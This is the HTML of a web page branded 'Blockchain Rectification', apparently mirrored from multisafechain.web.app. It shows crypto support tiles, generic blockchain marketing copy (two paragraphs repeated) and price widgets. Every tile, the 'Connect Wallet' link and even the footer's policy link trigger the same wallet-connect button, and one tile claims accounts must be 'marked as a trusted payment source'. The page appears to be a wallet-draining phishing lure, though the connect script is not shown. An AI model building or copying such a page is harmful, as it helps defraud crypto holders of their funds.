              d="M461.2 128H80c-8.84 0-16-7.16-16-16s7.16-16 16-16h384c8.84 0 16-7.16 16-16 0-26.51-21.49-48-48-48H64C28.65 32 0 60.65 0 96v320c0 35.35 28.65 64 64 64h397.2c28.02 0 50.8-21.53 50.8-48V176c0-26.47-22.78-48-50.8-48zM416 336c-17.67 0-32-14.33-32-32s14.33-32 32-32 32 14.33 32 32-14.33 32-32 32z">
            </path>
          </svg>
          <h4>Trading Wallet Issues</h4>
          <p>Click here if you have problem with your trading wallet.</p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round"
            stroke-linejoin="round" class="text-4xl" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
            <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
            <path
              d="M14.8 9a2 2 0 0 0 -1.8 -1h-1m-2.82 1.171a2 2 0 0 0 1.82 2.829h1m2.824 2.822a2 2 0 0 1 -1.824 1.178h-2a2 2 0 0 1 -1.8 -1">
            </path>
            <path d="M20.042 16.045a9 9 0 0 0 -12.087 -12.087m-2.318 1.677a9 9 0 1 0 12.725 12.73"></path>
            <path d="M12 6v2m0 8v2"></path>
            <path d="M3 3l18 18"></path>
          </svg>
          <h4>Unable To Buy Coins/Tokens</h4>
          <p>
            To trade crypto your account must be marked as a trusted payment
            source.
          </p>
        </a>
      </div>
      <div class="grid-item connectButton">
        <a class="connectButton placeholder-button connect-button">
          <svg stroke="currentColor" fill="none" stroke-width="0" viewBox="0 0 24 24" class="text-4xl" height="1em"
            width="1em" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M7 14C8.10457 14 9 13.1046 9 12C9 10.8954 8.10457 10 7 10C5.89543 10 5 10.8954 5 12C5 13.1046 5.89543 14 7 14Z"
              fill="currentColor"></path>
            <path
              d="M14 12C14 13.1046 13.1046 14 12 14C10.8954 14 10 13.1046 10 12C10 10.8954 10.8954 10 12 10C13.1046 10 14 10.8954 14 12Z"
              fill="currentColor"></path>
            <path
              d="M17 14C18.1046 14 19 13.1046 19 12C19 10.8954 18.1046 10 17 10C15.8954 10 15 10.8954 15 12C15 13.1046 15.8954 14 17 14Z"
              fill="currentColor"></path>
            <path fill-rule="evenodd" clip-rule="evenodd"
              d="M24 12C24 18.6274 18.6274 24 12 24C5.37258 24 0 18.6274 0 12C0 5.37258 5.37258 0 12 0C18.6274 0 24 5.37258 24 12ZM22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12Z"
              fill="currentColor"></path>
          </svg>
          <h4>Other Issues Not Listed</h4>
          <p>
            If you can't find the issue you are experiencing click here
          </p>
        </a>
      </div>
    </div>
  </section>
  <main>
    <div>
      <h1>Manage your transactions in one place</h1>
      <p>
        Every digital artwork on is authentic and truly unique. Blockchain
        technology makes this new approach to digital ownership possible.
      </p>
    </div>

    <div class="hero-banner">
      <img src="images/crypto%20card.html" alt="">
    </div>
  </main>

  <section class="block-rec">
    <h1>Decentralized Blockchain Technology</h1>
    <p>
      Decentralized blockchain technology represents a seismic shift in the
      landscape of digital infrastructure. At its core, it embodies principles
      of transparency, immutability, and decentralization, offering a robust
      solution to various challenges across industries.
    </p>
    <br>
    <p>
      By leveraging cryptographic techniques and consensus mechanisms,
      decentralized blockchains ensure that data remains tamper-proof and
      verifiable, fostering trust among participants without the need for
      intermediaries. This revolutionary approach not only enhances security
      but also streamlines processes, reduces costs, and opens doors to
      innovative applications.
    </p>
    <br>
    <p>
      From financial services to supply chain management, decentralized
      blockchain technology is reshaping traditional systems, democratizing
      access, and paving the way for a more inclusive and equitable future.
    </p>
    <br>
    <p>
      By leveraging cryptographic techniques and consensus mechanisms,
      decentralized blockchains ensure that data remains tamper-proof and
      verifiable, fostering trust among participants without the need for
      intermediaries. This revolutionary approach not only enhances security
      but also streamlines processes, reduces costs, and opens doors to
      innovative applications.
    </p>
    <br>
    <p>
      From financial services to supply chain management, decentralized
      blockchain technology is reshaping traditional systems, democratizing
      access, and paving the way for a more inclusive and equitable future.
    </p>
    <a class="connectButton placeholder-button connect-button">Connect Wallet</a>
  </section>

  <div style="
        height: 480px;
        background-color: #ffffff;
        overflow: hidden;
        box-sizing: border-box;
        border: 1px solid #56667f;
        border-radius: 4px;
        text-align: right;
        line-height: 14px;
        font-size: 12px;
        font-feature-settings: normal;
        text-size-adjust: 100%;
        padding: 5px;
        padding: 0px;
        margin: 0px;
        width: 100%;
      ">
    <div style="height: 540px; padding: 0px; margin: 0px; width: 100%">
      <iframe src="https://widget.coinlib.io/widget?type=chart&amp;theme=light&amp;coin_id=637&amp;pref_coin_id=1505"
        width="100%" height="536px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0"
        style="border: 0; margin: 0; padding: 0; line-height: 14px"></iframe>
    </div>
    <div style="
          color: #ffffff;
          line-height: 14px;
          font-weight: 400;
          font-size: 11px;
          box-sizing: border-box;
          padding: 2px 6px;
          width: 100%;
          font-family: Poppins, Tahoma, Arial, sans-serif;
        "></div>
  </div>

  <!-- TradingView Widget BEGIN -->
  <div class="tradingview-widget-container">
    <div class="tradingview-widget-container__widget"></div>
    <div class="tradingview-widget-copyright"></div>
    <script type="text/javascript" src="js/embed-widget-timeline.html" async="">
      {
        "feedMode": "all_symbols",
          "isTransparent": false,
            "displayMode": "adaptive",
              "width": "100%",
                "height": "80%",
                  "colorTheme": "light",
                    "locale": "en"
      }
    </script>
  </div>
  <!-- TradingView Widget END -->

  <coingecko-coin-price-marquee-widget coin-ids="bitcoin,ethereum,eos,ripple,litecoin" currency="usd"
    background-color="#fae4ff" locale="en"></coingecko-coin-price-marquee-widget>

  <footer>
    <p>Copyright © 2023 Blockchain Rectification . All rights reserved.</p>
    <a class="connectButton placeholder-button connect-button">Privacy Policy • Terms of Service</a>
  </footer>


</body>


<!-- Mirrored from multisafechain.web.app/css/fonts/icofont.woff2 by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 02 Oct 2025 19:01:05 GMT -->
</html>